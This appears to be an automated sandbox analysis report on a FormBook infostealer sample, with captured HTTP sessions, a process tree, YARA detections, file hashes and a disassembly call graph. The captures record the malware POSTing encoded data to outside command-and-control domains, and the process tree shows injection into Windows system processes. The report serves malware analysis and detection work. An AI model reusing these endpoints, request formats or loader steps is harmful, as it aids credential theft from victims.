                                                            Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.1049997104.21.44.16806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:15:21.181832075 CET1727OUTPOST /stfe/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.3kw40881107247y.click
                                                            Origin: http://www.3kw40881107247y.click
                                                            Referer: http://www.3kw40881107247y.click/stfe/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1229
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 44 54 43 34 31 41 43 77 64 38 2b 6b 78 58 58 38 31 63 65 47 46 36 48 37 69 71 2b 52 31 43 69 62 34 6e 42 34 65 48 4f 53 55 6b 46 79 42 36 34 63 51 6f 30 33 48 6b 34 55 6f 52 38 7a 31 32 69 4c 34 34 49 33 4f 72 4f 53 66 53 42 4e 46 44 56 61 53 32 30 43 4a 2b 4a 37 4b 68 46 75 48 2b 59 34 64 53 36 47 31 49 62 42 70 63 46 74 68 36 2b 79 6a 49 70 5a 30 37 34 6f 7a 53 5a 36 59 51 34 33 34 78 4d 6a 51 6a 46 71 77 4d 4f 6d 5a 49 44 61 30 56 6d 44 47 33 4c 73 4b 45 39 4b 30 2b 44 66 4d 6e 50 54 65 46 38 4c 6f 65 41 50 4a 4a 59 39 7a 78 57 51 56 30 54 56 77 78 79 49 2f 33 75 36 72 79 78 34 66 4c 64 4a 44 63 56 6b 49 48 34 52 61 58 4c 78 57 6e 56 6a 69 70 30 45 79 53 76 62 50 2b 37 2f 48 38 50 78 36 4f 34 4a 65 6c 69 50 47 36 7a 6a 71 54 41 4b 76 4e 74 38 6f 78 30 4a 49 78 59 66 79 36 79 50 71 77 52 47 66 7a 56 69 61 75 6f 79 6b 2f 30 69 43 5a 57 43 70 4b 36 55 59 70 6e 32 2b 4e 55 37 6c 6d 2f 53 57 52 76 57 61 35 37 71 37 2b 62 77 6a 31 62 6c 4c 39 74 41 42 59 37 4a 6f 55 4c 4f 57 31 53 54 6c [TRUNCATED]
                                                            Data Ascii: 9HaD=DTC41ACwd8+kxXX81ceGF6H7iq+R1Cib4nB4eHOSUkFyB64cQo03Hk4UoR8z12iL44I3OrOSfSBNFDVaS20CJ+J7KhFuH+Y4dS6G1IbBpcFth6+yjIpZ074ozSZ6YQ434xMjQjFqwMOmZIDa0VmDG3LsKE9K0+DfMnPTeF8LoeAPJJY9zxWQV0TVwxyI/3u6ryx4fLdJDcVkIH4RaXLxWnVjip0EySvbP+7/H8Px6O4JeliPG6zjqTAKvNt8ox0JIxYfy6yPqwRGfzViauoyk/0iCZWCpK6UYpn2+NU7lm/SWRvWa57q7+bwj1blL9tABY7JoULOW1STlQz2rurE7li0z1jLrrr8QwKr6iBT5WIFvbIbhc4QX9+VrZhDaEPBaOFzI1rLlaUNw/Yr484MX2XnPCxZIrmgrbEr10Fwexizvs70uEOGDNnS++wg6uOBNSBmqon/BHSXayaSANY3ZrBnSdi2gVUz16KpWSKLFk8FZLdIyj3Ebuva2JpdOMj3+NfhMz9Hp7itvxetXFtICMaVqiey7IqxPqyXOkPw0qt19ad4PbZ3e91y+VBVjAkTCImNQJ8osTJuKhU2VjdQPD6bMul3N0mwgTH6x+t0cvmHf1R7Hl3CtlW3BRi/uEqYQHidQMRWqzWGnyJDkuuBhBD7ZecYO+rOs7qi4lUWtk55uw/tYpVIrgNYzwNUqjLmqC7mcOwT/8ZCgq2IPRf5fx9UH4igUGLquLY82LwV1lPMRVYUrv+XOd6GMBtfYaLot76eaGURbFZh5oL3Rqmmivpm/udPX8QvSUZFpSq/6gHow9NCCpylC2EVMIL+zYGA6arTKrLqeAxEdN/RJ9gno8JEq6dhC9OBcLBoqduFQsZabZhLcMT2xCNXUe2snZGmFIzlSb0olRSmwmM8A3nsQJw1Os88LznQwngMn+1nHQN/xis0N3V9uQIlfuq1JTxzhH1UvpUR+kIONs+tMtDdY6f++A8MJCQT4E+ohnw7rDN9i4m [TRUNCATED]
                                                            Nov 24, 2024 08:15:22.273236036 CET898INHTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:22 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3LcPh%2FKNuOOVm%2FpjcbMQLpLUJyTcXZyZwgrQaAW31bwVtTvuWDVRHOkwVQekiOxQdGXzcVsAfO4esPjdR8AF24eZ%2FSbNuFZOlInZj2lDjtaJO6RZ3xRydUBvA5tLQBZJD5Yw6Ncxk1WSXXHh"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e779b7f19664392-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1573&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1727&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.1049998104.21.44.16806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:15:23.833026886 CET409OUTGET /stfe/?wdv4=1RD4&9HaD=ORqY22CcDufF1m336sq5Rb7ktLrp91WB7UJGYn2fYGIkb40HC4QAI0Uo1DAA/E2P6coBVsarHDRzXgtbaXIBPtY5QkEUWLhgXwOO0YSIlO9ptKaJ+w== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.3kw40881107247y.click
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:15:24.989691973 CET912INHTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:24 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WjFf8F8XyA3lxztUDi8UFjl52I2VDdkS5WewFsuUDLrY6XzXLZvZNVWGInnRDPaJGZOo02PsbnoXPI6ugaQpVjJ1O4LHeFk%2Bc8%2Fyib8XE1ljIMpedAB1nc2fZdzAdfIv9CzTV%2BN4fzx%2BIEZe"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e779b900e8b80da-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1478&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=409&delivery_rate=0&cwnd=128&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.104999913.248.169.48806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:15:30.564306021 CET666OUTPOST /cclj/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.heliopsis.xyz
                                                            Origin: http://www.heliopsis.xyz
                                                            Referer: http://www.heliopsis.xyz/cclj/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 193
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 78 38 42 64 67 38 65 4e 68 70 73 42 4a 50 45 71 44 31 57 59 54 6b 72 33 52 37 6e 6c 43 58 65 56 48 4b 4f 52 75 64 30 52 70 32 57 34 6d 57 55 6a 57 55 6a 6a 55 38 55 6e 68 51 43 64 4d 50 79 4d 5a 41 78 4e 58 68 55 35 6a 45 45 7a 66 6e 72 5a 74 38 69 4d 4c 2b 41 5a 71 38 4c 6d 43 76 56 78 67 6f 42 55 32 6e 6d 57 62 4d 69 6a 32 51 62 68 6a 4b 57 67 53 73 68 43 75 69 39 57 4a 4d 38 78 4f 66 71 4e 6e 47 53 70 57 49 2f 79 53 39 74 79 39 45 38 6d 4e 44 6b 30 71 4e 69 67 64 4b 7a 6c 49 72 6f 4a 6a 2f 68 57 36 59 38 4c 69 4b 76 50 6a 55 2f 6f 6d 4b 50 70 61 50 32 31
                                                            Data Ascii: 9HaD=x8Bdg8eNhpsBJPEqD1WYTkr3R7nlCXeVHKORud0Rp2W4mWUjWUjjU8UnhQCdMPyMZAxNXhU5jEEzfnrZt8iML+AZq8LmCvVxgoBU2nmWbMij2QbhjKWgSshCui9WJM8xOfqNnGSpWI/yS9ty9E8mNDk0qNigdKzlIroJj/hW6Y8LiKvPjU/omKPpaP21


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.105000013.248.169.48806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:15:33.228332043 CET690OUTPOST /cclj/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.heliopsis.xyz
                                                            Origin: http://www.heliopsis.xyz
                                                            Referer: http://www.heliopsis.xyz/cclj/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 217
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 78 38 42 64 67 38 65 4e 68 70 73 42 49 73 73 71 47 56 71 59 62 6b 72 30 64 62 6e 6c 4c 33 66 53 48 4b 79 52 75 63 41 37 70 45 79 34 6d 33 6b 6a 58 52 44 6a 52 38 55 6e 75 77 43 45 43 76 7a 43 5a 41 39 76 58 6a 41 35 6a 45 34 7a 66 6d 62 5a 78 66 61 4c 52 4f 41 4d 73 38 4c 34 4d 50 56 78 67 6f 42 55 32 6a 50 39 62 4d 71 6a 32 44 44 68 67 76 36 6a 63 4d 68 44 70 69 39 57 44 63 38 74 4f 66 71 6a 6e 43 4b 54 57 4f 7a 79 53 39 64 79 38 51 67 6c 57 54 6b 79 33 64 69 31 53 34 58 71 4f 62 4d 4e 36 4a 4e 48 34 4c 45 2f 68 72 53 49 79 46 65 2f 31 39 54 6e 55 4a 44 66 69 6d 50 4d 34 32 4e 44 70 69 33 70 4a 64 54 68 44 6e 2b 6b 44 67 3d 3d
                                                            Data Ascii: 9HaD=x8Bdg8eNhpsBIssqGVqYbkr0dbnlL3fSHKyRucA7pEy4m3kjXRDjR8UnuwCECvzCZA9vXjA5jE4zfmbZxfaLROAMs8L4MPVxgoBU2jP9bMqj2DDhgv6jcMhDpi9WDc8tOfqjnCKTWOzyS9dy8QglWTky3di1S4XqObMN6JNH4LE/hrSIyFe/19TnUJDfimPM42NDpi3pJdThDn+kDg==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.105000113.248.169.48806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:15:35.885054111 CET1703OUTPOST /cclj/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.heliopsis.xyz
                                                            Origin: http://www.heliopsis.xyz
                                                            Referer: http://www.heliopsis.xyz/cclj/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1229
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 78 38 42 64 67 38 65 4e 68 70 73 42 49 73 73 71 47 56 71 59 62 6b 72 30 64 62 6e 6c 4c 33 66 53 48 4b 79 52 75 63 41 37 70 45 36 34 6d 46 73 6a 57 33 4c 6a 57 38 55 6e 6a 51 43 42 43 76 7a 50 5a 41 31 72 58 6a 38 48 6a 42 30 7a 5a 77 76 5a 39 2b 61 4c 66 2b 41 4d 75 38 4c 6c 43 76 55 7a 67 6f 52 51 32 6e 72 39 62 4d 71 6a 32 46 48 68 33 71 57 6a 52 73 68 43 75 69 39 4b 4a 4d 38 4a 4f 65 43 56 6e 43 47 44 56 2b 54 79 53 5a 78 79 77 46 38 6c 61 54 6b 77 30 64 6a 77 53 34 71 71 4f 62 51 37 36 4e 46 74 34 49 6b 2f 78 38 69 66 75 47 6d 6a 67 37 66 69 56 71 33 4e 76 51 58 76 2b 30 42 47 71 6a 7a 2b 4b 63 32 47 46 6e 58 7a 57 4a 49 4b 30 42 41 54 73 32 31 4e 48 4e 31 57 34 37 63 54 51 64 43 67 62 6f 70 4f 46 46 38 38 35 72 43 79 33 41 65 55 4c 42 4f 75 58 62 72 4f 56 34 34 76 6d 79 4a 6a 38 53 77 70 6d 50 6e 41 32 55 57 34 49 46 35 35 57 55 31 75 5a 48 39 6d 52 6d 2f 42 64 5a 69 75 5a 30 56 4e 62 68 32 4e 4b 33 6f 4c 41 7a 55 75 2f 58 57 4c 34 70 6a 36 4e 51 51 4c 4d 74 31 55 2f 6e 6d 37 77 [TRUNCATED]
                                                            Data Ascii: 9HaD=x8Bdg8eNhpsBIssqGVqYbkr0dbnlL3fSHKyRucA7pE64mFsjW3LjW8UnjQCBCvzPZA1rXj8HjB0zZwvZ9+aLf+AMu8LlCvUzgoRQ2nr9bMqj2FHh3qWjRshCui9KJM8JOeCVnCGDV+TySZxywF8laTkw0djwS4qqObQ76NFt4Ik/x8ifuGmjg7fiVq3NvQXv+0BGqjz+Kc2GFnXzWJIK0BATs21NHN1W47cTQdCgbopOFF885rCy3AeULBOuXbrOV44vmyJj8SwpmPnA2UW4IF55WU1uZH9mRm/BdZiuZ0VNbh2NK3oLAzUu/XWL4pj6NQQLMt1U/nm7wrK2r8DddHv5lYoje0kuB/7t80OywCPtGbkPej562OBFm+9wfAgXRzLVyOGEA4jWGT/Q7ZvlsmKn9z+hi4V2sJ+s6WWJ0bbcib2+R0Q+6dXzIQpmnNJykNsLw2HgeSyXIpJYhfTwI51oYIcONwGDllTcLbgtOZlz7nIgUB2JxhSht5z/TTbbpBgyRrnAFHo+Yx9tm9IcXKP9iOo4LIfTgYBlbEnJhHLIvZg+3rqcYLBYFVpkU1bdGmUy/bodF/jHkdutM5f2QzzwcrSFWXpJP/b6IMRUEBuXJLJDMAcg7+Ss1HnB0VFTWLYSZEdNhhfdhfY0bfXnVikKHM5jrOQy6edLh17tvuMzswCR3afOPm/lPRDWnYbP6Q9cmIHutWW+YZwWDCx5t7mKPjSO5T+bhh31swDK4tp1rRYINGWZu/MGZFJxyz6O62zVrKnxSInlkYcZ/8XHGBoqmavhh39If5J1ICM4zrObuz8CA2SrsopYO6MvlGTuBHNoIDAuWZtrb3jWbv28HOMMZryd/y0RjctdVEGM5xf0GsoaKRblkBi7QA3uX2sAomK7nnWxv11jb88XGyKp4gd7xhItBD7u96X1Q7dqb3aghtz0t+l16U0k2w5oQu2M2/8UjQ5xcq8eFwQm3LaaigO+ulc5MmvYU+fnllS0HudhobO [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.105000213.248.169.48806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:15:38.535698891 CET401OUTGET /cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.heliopsis.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:15:39.670455933 CET386INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Sun, 24 Nov 2024 07:15:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 246
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 48 61 44 3d 38 2b 70 39 6a 49 2b 57 38 70 34 67 47 66 6b 72 4a 30 36 49 62 47 37 47 56 72 44 72 46 45 33 39 47 62 65 76 69 37 4d 4d 6f 47 2f 6d 78 56 30 4f 4a 33 62 42 51 36 5a 66 7a 48 47 69 49 65 62 4a 44 7a 78 64 4a 55 38 33 35 67 6f 76 4b 33 57 71 33 2f 32 4f 58 63 55 62 36 70 7a 6a 4c 66 38 77 69 71 46 77 2f 51 48 63 59 4d 4b 34 73 79 7a 6a 69 41 3d 3d 26 77 64 76 34 3d 31 52 44 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4"}</script></head></html>


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:2
                                                            Start time:02:12:36
                                                            Start date:24/11/2024
                                                            Path:C:\Users\user\Desktop\VSP469620.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\VSP469620.exe"
                                                            Imagebase:0xab0000
                                                            File size:1'207'808 bytes
                                                            MD5 hash:E4CB2AC542D27B0C73C5A290BF5FFE77
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:02:12:37
                                                            Start date:24/11/2024
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\VSP469620.exe"
                                                            Imagebase:0xfe0000
                                                            File size:46'504 bytes
                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1818834622.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1818515426.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1819214372.0000000005350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:02:13:21
                                                            Start date:24/11/2024
                                                            Path:C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe"
                                                            Imagebase:0x740000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3144417314.0000000004490000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:7
                                                            Start time:02:13:24
                                                            Start date:24/11/2024
                                                            Path:C:\Windows\SysWOW64\icsunattend.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\icsunattend.exe"
                                                            Imagebase:0x6c0000
                                                            File size:13'824 bytes
                                                            MD5 hash:6D01FCE30EF8A2CA0D385593E90879E5
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3143800375.0000000002990000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3141775321.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3143584340.0000000002940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            General

                                                            Target ID:10
                                                            Start time:02:13:36
                                                            Start date:24/11/2024
                                                            Path:C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe"
                                                            Imagebase:0x740000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3143475754.0000000001160000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:12
                                                            Start time:02:13:49
                                                            Start date:24/11/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff613480000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:4.3%
                                                              Dynamic/Decrypted Code Coverage:1.2%
                                                              Signature Coverage:7%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:149
                                                              execution_graph 86926 e87b4b 86929 e877c0 86926->86929 86928 e87b97 86942 e851f0 86929->86942 86932 e87890 CreateFileW 86938 e8789d 86932->86938 86939 e8785f 86932->86939 86933 e878b9 VirtualAlloc 86934 e878da ReadFile 86933->86934 86933->86938 86937 e878f8 VirtualAlloc 86934->86937 86934->86938 86935 e87aba 86935->86928 86936 e87aac VirtualFree 86936->86935 86937->86938 86937->86939 86938->86935 86938->86936 86939->86933 86939->86938 86940 e879c0 CloseHandle 86939->86940 86941 e879d0 VirtualFree 86939->86941 86945 e886d0 GetPEB 86939->86945 86940->86939 86941->86939 86944 e8587b 86942->86944 86947 e88670 GetPEB 86942->86947 86944->86939 86946 e886fa 86945->86946 86946->86932 86947->86944 86948 b219ba 86953 acc75a 86948->86953 86952 b219c9 86962 abd7f7 86953->86962 86957 b2ccc3 86959 acc865 86959->86957 86960 acc881 86959->86960 86970 acd1fa 48 API calls _memcpy_s 86959->86970 86961 ad0f0a 52 API calls __cinit 86960->86961 86961->86952 86971 acf4ea 86962->86971 86964 abd818 86965 acf4ea 48 API calls 86964->86965 86966 abd826 86965->86966 86967 acd26c 86966->86967 87002 acd298 86967->87002 86970->86959 86972 acf4f2 __calloc_impl 86971->86972 86974 acf50c 86972->86974 86975 acf50e std::exception::exception 86972->86975 86980 ad395c 86972->86980 86974->86964 86994 ad6805 RaiseException 86975->86994 86977 acf538 86995 ad673b 47 API calls _free 86977->86995 86979 acf54a 86979->86964 86981 ad39d7 __calloc_impl 86980->86981 86984 ad3968 __calloc_impl 86980->86984 87001 ad7c0e 47 API calls __getptd_noexit 86981->87001 86982 ad3973 86982->86984 86996 ad81c2 47 API calls 2 library calls 86982->86996 86997 ad821f 47 API calls 8 library calls 86982->86997 86998 ad1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 86982->86998 86984->86982 86986 ad399b RtlAllocateHeap 86984->86986 86989 ad39c3 86984->86989 86992 ad39c1 86984->86992 86986->86984 86987 ad39cf 86986->86987 86987->86972 86999 ad7c0e 47 API calls __getptd_noexit 86989->86999 87000 ad7c0e 47 API calls __getptd_noexit 86992->87000 86994->86977 86995->86979 